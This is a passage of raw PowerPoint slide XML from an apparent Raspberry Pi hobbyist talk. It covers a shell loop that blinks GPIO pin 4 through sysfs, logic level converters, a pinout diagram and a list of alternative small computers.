                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"out"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>direction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"1"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"0"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>gpio4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>done</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1276227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voltage?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Logic Level Converters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://www.sparkfun.com/products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>8745</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="IMG_20120705_1434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590800"/>
            <a:ext cx="4935321" cy="3713829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831287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“Is It High?”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="1752600"/>
            <a:ext cx="7620000" cy="4627880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln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110" y="4345744"/>
            <a:ext cx="1343790" cy="114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65017" y="2717394"/>
            <a:ext cx="2082799" cy="1190171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>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57" y="1912246"/>
            <a:ext cx="1858245" cy="425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rot="10800000" flipV="1">
            <a:off x="1981203" y="2413517"/>
            <a:ext cx="4190997" cy="654468"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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flipH="1" flipV="1">
            <a:off x="3773747" y="2779453"/>
            <a:ext cx="1672708" cy="1600202"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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a:off x="3241041" y="3053079"/>
            <a:ext cx="2392680" cy="340362"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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V="1">
            <a:off x="5410200" y="2590798"/>
            <a:ext cx="762000" cy="152401"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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a:off x="4607564" y="2026920"/>
            <a:ext cx="2555239" cy="386600"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100497"/>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H="1">
            <a:off x="3452130" y="3416556"/>
            <a:ext cx="2006079" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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a:off x="1676401" y="3312478"/>
            <a:ext cx="2133599" cy="2021522"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 64644"/>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a:off x="4455171" y="5334000"/>
            <a:ext cx="802629" cy="241036"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -633"/>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rot="16200000" flipH="1">
            <a:off x="4001987" y="4319222"/>
            <a:ext cx="1708998" cy="802631"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17302"/>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rot="5400000">
            <a:off x="-647700" y="3924300"/>
            <a:ext cx="3733802" cy="914402"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4422"/>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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="762000" y="5334000"/>
            <a:ext cx="3505200" cy="914402"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -434"/>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0919" y="6518977"/>
            <a:ext cx="4916731" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>RPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Pinout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>bogarted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://elinux.org/RPi_Low-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>level_peripherals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4724400"/>
            <a:ext cx="2057400" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fixed!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2066326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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Laptop/PDA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>ZipIt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Min-ITX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Beagle Board</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>beagleboard.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Plug Computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>WRT-54G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
